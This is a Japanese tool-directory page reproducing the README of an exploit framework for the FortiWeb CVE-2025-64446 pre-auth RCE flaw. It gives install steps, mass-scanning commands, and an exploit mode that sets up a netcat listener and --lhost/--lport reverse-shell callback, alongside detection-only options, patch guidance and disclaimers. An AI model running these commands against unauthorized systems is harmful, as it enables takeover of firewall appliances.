Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
FortiWeb-cve-2025-64446-RCE-exploit — FortiWeb の CVE-2025-64446 脆弱性に対応したセキュリティ研究ツール。高度なロギング、リアルタイムメトリクス、プロキシデバッグ、プロフェッショナルなレポート出力を備えた自動化エクスプロイトフレームワークです。リトライロジック、マルチスレッド、設定可能なオプションを含みます。許可されたセキュリティテスト専用です。CVSS 9.8 緊急。 | Kitploit
ツール/GitHubGitHub/cerberusmrxi/fortiweb-cve-2025-64446-rce-exploit
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテスト
GitHubcerberusmrxi/fortiweb-cve-2025-64446-rce-exploit

FortiWeb-cve-2025-64446-RCE-exploit

FortiWeb の CVE-2025-64446 脆弱性に対応したセキュリティ研究ツール。高度なロギング、リアルタイムメトリクス、プロキシデバッグ、プロフェッショナルなレポート出力を備えた自動化エクスプロイトフレームワークです。リトライロジック、マルチスレッド、設定可能なオプションを含みます。許可されたセキュリティテスト専用です。CVSS 9.8 緊急。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
121日前未レビュー

FortiWeb CVE-2025-64446 RCE Exploit

Python License CVSS CVE Status Version

プロフェッショナルなセキュリティ研究・脆弱性評価フレームワーク

インストール · クイックスタート · 使用ガイド · アーキテクチャ · CLI リファレンス · 免責事項


概要

FortiWeb Research Tool は、FortiWeb Web Application Firewall アプライアンスに影響する重大な事前認証リモートコード実行の脆弱性 CVE-2025-64446 を、認可された検出と分析の対象とする Python 評価フレームワークです。

属性詳細
作者Sudeepa Wanigarathna
CVECVE-2025-64446
CVSS9.8(重大)
クラス認証バイパス + パストラバーサル → 任意ファイルアップロード → RCE
影響を受けるバージョン7.6.7 / 7.8.7 / 8.0.2 より前のビルド(公式アドバイザリで確認してください)
対策パッチ適用済みの FortiWeb リリースにアップグレード
言語Python 3.7+
エントリーポイントexploit.py

主な機能


脆弱性サマリー

エンゲージメントの範囲を決定する前に、影響を受けるバージョンと修正済みバージョンを必ず Fortinet PSIRT で確認してください。


📸 スクリーンショット

使用例スキャン結果
ダッシュボードスキャン結果

インストール

root@kitploit:~
git clone https://github.com/CerberusMrXi/FortiWeb-cve-2025-64446-RCE-exploit
cd FortiWeb-cve-2025-64446-RCE-exploit

python3 -m venv venv
source venv/bin/activate          # Linux / macOS
# venv\Scripts\activate           # Windows

pip install -r requirements.txt
python3 exploit.py --help

依存関係

パッケージ役割
requests,

任意(開発用): pytest、black、flake8、mypy、python-dotenv — requirements.txt を参照してください。


クイックスタート

root@kitploit:~
# Vulnerability check only (recommended first)
python3 exploit.py --target https://192.168.1.100:8443 --detect-only

# Safe / read-only checks
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode

# Mass scanning
python3 exploit.py --targets targets.txt --scan-mode --threads 10

# Authorized exploitation (requires listener host)
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444

注記: エクスプロイトモードでは --lhost が必要です。完全なチェーンを実行する予定がない場合は、--detect-only または --safe-mode を使用してください。


使用ガイド

検出モード

root@kitploit:~
python3 exploit.py --target https://192.168.1.100:8443 --detect-only
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --verbose
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --timeout 30

検出モードは、到達可能性、バージョンヒント、API 露出、パストラバーサルの兆候、認証バイパスのシグナル、アップロードエンドポイントの到達性を評価します。これらの指標から、リスクは重大 / 高 / 中 / 低に分類されます。

大量スキャン

root@kitploit:~
cat > targets.txt << 'EOF'
https://192.168.1.100:8443
https://192.168.1.101:8443
https://192.168.1.102:8443
EOF

python3 exploit.py --targets targets.txt --scan-mode
python3 exploit.py --targets targets.txt --scan-mode --threads 20 --verbose
python3 exploit.py --targets targets.txt --scan-mode --output-dir ./reports

ScannerManager はスレッドプールを介して FortiWebScanner ワーカーを実行し、Rich のサマリーテーブルを表示して、scan_report.json / scan_report.html を書き出します。

エクスプロイトモード(認可されたラボのみ)

root@kitploit:~
# Start your listener first (example)
nc -lvnp 4444

python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --proxy http://127.0.0.1:8080
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --dry-run
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --user-agent "Research/1.0"

設定ファイル

root@kitploit:~
# config.yaml
target: https://192.168.1.100:8443
lhost: 192.168.1.50
lport: 4444
timeout: 15
threads: 5
verify_ssl: false
verbose: true
proxy: http://127.0.0.1:8080
user_agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
output_dir: reports
log_dir: logs
detect_only: false
safe_mode: false
dry_run: false
root@kitploit:~
python3 exploit.py --config config.yaml
python3 exploit.py --config config.yaml --target https://10.0.0.1:8443 --lport 9999

CLI フラグは YAML から読み込まれた値を上書きします。


アーキテクチャ

root@kitploit:~
exploit.py
├── ExploitConfig / ExploitResult / RequestMetrics   # dataclasses
├── LogManager                                       # exploit.log, errors.log, requests.log
├── Banner / StatusDisplay                           # Rich / colorama UI
├── FortiWebScanner                                  # detect-only checks (no exploit chain)
├── ScannerManager                                   # threaded multi-target scans + reports
├── FortiWebExploit                                  # single-target detect / exploit workflow
└── main()                                           # argparse + mode dispatch
コンポーネント役割
FortiWebScanner到達可能性、バージョン、CVE インジケーターチェック
ScannerManager並列スキャン、JSON/HTML 集計、サマリーテーブル

単一ターゲットの高レベルのフロー:

  1. バナー表示 / ロギング設定
  2. 到達可能性とバージョンのプローブ
  3. インジケーターチェック(detect/safe モード以外では完全なチェーン)
  4. reports/ 配下に JSON + HTML レポートを出力
  5. 該当する場合はクリーンアップ

機能

検出

  • 管理 API パスに対するパストラバーサルインジケーターチェック
  • 認証バイパスのシグナルチェック
  • 一般的なステータス/バージョンエンドポイントでの FortiWeb バージョンのプローブ
  • API エンドポイント露出のマッピング
  • ファイルアップロードエンドポイントの到達性チェック
  • 複合インジケーターによるリスクスコアリング

レポートと可観測性

  • タイムスタンプ付きの JSON および HTML レポート
  • リクエストごとのメトリクス(ステータス、レイテンシ、成功率)
  • 個別のログ: exploit.log、errors.log、requests.log

運用コントロール

  • マルチスレッドによる大量スキャン(--threads)
  • HTTP/HTTPS プロキシのサポート(例: Burp)
  • 試行回数/遅延を設定可能なリトライ(デフォルト: 3回 / 2秒)
  • カスタム User-Agent、タイムアウト、SSL 検証の切り替え(--no-verify)
  • Colorama + Rich によるカラーコンソール出力

生成される出力

root@kitploit:~
reports/
├── report_YYYYMMDD_HHMMSS.json
├── report_YYYYMMDD_HHMMSS.html
├── scan_report.json
└── scan_report.html

logs/
├── exploit.log
├── errors.log
└── requests.log

JSON レポートのサンプル(検出)

root@kitploit:~
{
  "metadata": {
    "tool_name": "FortiWeb Research Tool",
    "version": "1.0",
    "author": "Sudeepa Wanigarathna",
    "timestamp": "2026-07-31T00:02:17",
    "mode": "detect"
  },
  "target": {
    "url": "https://192.168.1.100:8443",
    "reachable": true,
    "version": "7.6.0",
    "vulnerable": true,
    "risk_level": "Critical"
  },
  "metrics": {
    "total_requests": 12,
    "average_response_time": 0.42,
    "success_rate": 0.91
  }
}

コマンドリファレンス

root@kitploit:~
python3 exploit.py [OPTIONS]

プロジェクト構造

root@kitploit:~
.
├── exploit.py           # Research tool (detect / scan / exploit)
├── config.yaml          # Example configuration
├── requirements.txt     # Python dependencies
├── reports/             # Generated JSON / HTML reports
├── logs/                # Runtime logs
├── LICENSE
├── SECURITY.md
├── .gitignore
└── README.md

緩和策のガイダンス

  1. FortiWeb をパッチ適用済みのリリース(7.6.7+、7.8.7+、8.0.2+、または現在の PSIRT ガイダンス)にアップグレードしてください。
  2. 管理インターフェースを信頼できるネットワーク / ジャンプホストに制限してください。
  3. 認証およびメンテナンス API のアクティビティを監視し、異常なアクセスを検出してください。
  4. 確認された露出後は認証情報をローテーションし、整合性をレビューしてください。
  5. パッチ適用後に --detect-only / --safe-mode を再実行して、修復を検証してください。

法的および倫理的免責事項

このツールは、認可されたセキュリティテスト、研究、教育のみを目的としています。

  • 所有している、またはテストするための明示的な書面による許可を得ているシステムでのみ使用してください
  • 責任ある開示とバグ報奨金プログラムのルールに従ってください
  • 不正アクセス、危害、違法行為に使用しないでください

本ソフトウェアを使用することにより、あなたが認可を得ていること、誤用しないこと、および自身の行動に対する全責任を負うことを確認したことになります。作者は誤用について一切責任を負いません。

このプロジェクトに関連する脆弱性の非公開報告については、SECURITY.md を参照してください。


リソース

  • Fortinet PSIRT
  • アドバイザリ: FG-IR-25-64446
  • パッチのダウンロード
  • NVD: CVE-2025-64446

コントリビューション

  1. リポジトリをフォークします
  2. ブランチを作成します: git checkout -b feature/your-change
  3. 明確なメッセージでコミットします
  4. プッシュしてプルリクエストを開きます

変更は認可されたラボ環境でのみ検証し、実在するターゲットデータ、Cookie、認証情報をコミットしないようにしてください。


ライセンス

MIT ライセンス — LICENSE を参照してください。

Copyright (c) 2026 Sudeepa Wanigarathna


作者とサポート

作者Sudeepa Wanigarathna
イシューこのリポジトリの GitHub Issues
セキュリティSECURITY.md を参照 · [email protected]

認可された研究のみ · FortiWeb CVE-2025-64446

先頭に戻る

ツールをダウンロード
モードフラグ目的
検出--detect-only悪用を伴わない脆弱性インジケーター
セーフ / 読み取り専用--safe-mode状態を変更するエクスプロイト手順をスキップ
大量スキャン--targets + --scan-mode並列でのマルチターゲット評価
エクスプロイト--target + --lhost認可されたラボ環境のみで制御されたチェーンを実行
ドライラン--dry-run変更を適用せずにフローを実行
レポート--output-dirJSON + HTML のエンゲージメントレポート
項目値
CVE IDCVE-2025-64446
CVSS スコア9.8(重大)
影響悪用に成功した場合、システム全体が侵害される
修正7.6.7、7.8.7、8.0.2 以降にアップグレード
HTML 出力
ターミナル出力
urllib3
HTTP クライアント
rich, colorama, tqdmターミナル UI と進捗表示
pyyamlconfig.yaml の読み込み
FortiWebExploit設定駆動のセッション、リトライ、メトリクス、レポート、オプションのエクスプロイトパス
LogManager構造化ファイルログとカラーコンソール
オプション説明
--target URL単一の FortiWeb ベース URL
--targets FILE改行区切りのターゲットリスト
--lhost IPリスナーホスト(エクスプロイトに必須)
--lport PORTリスナーポート(デフォルト: 4444)
--config FILEYAML 設定ファイル
--detect-only検出のみ。エクスプロイトチェーンをスキップ
--scan-modeマルチターゲットスキャン(--targets が必要)
--safe-mode読み取り専用。状態を変更する手順をスキップ
--dry-run変更を適用しないドライラン
--timeout SECリクエストタイムアウト(デフォルト: 15)
--threads Nスキャンワーカー数(デフォルト: 5)
--proxy URLHTTP プロキシ
--user-agent STRカスタム User-Agent
-v, --verbose詳細なログ / コンソール出力
--no-verifyTLS 証明書の検証を無効化
--output-dir DIRレポートディレクトリ(デフォルト: reports)
--log-dir DIRログディレクトリ(デフォルト: logs)
-h, --helpヘルプを表示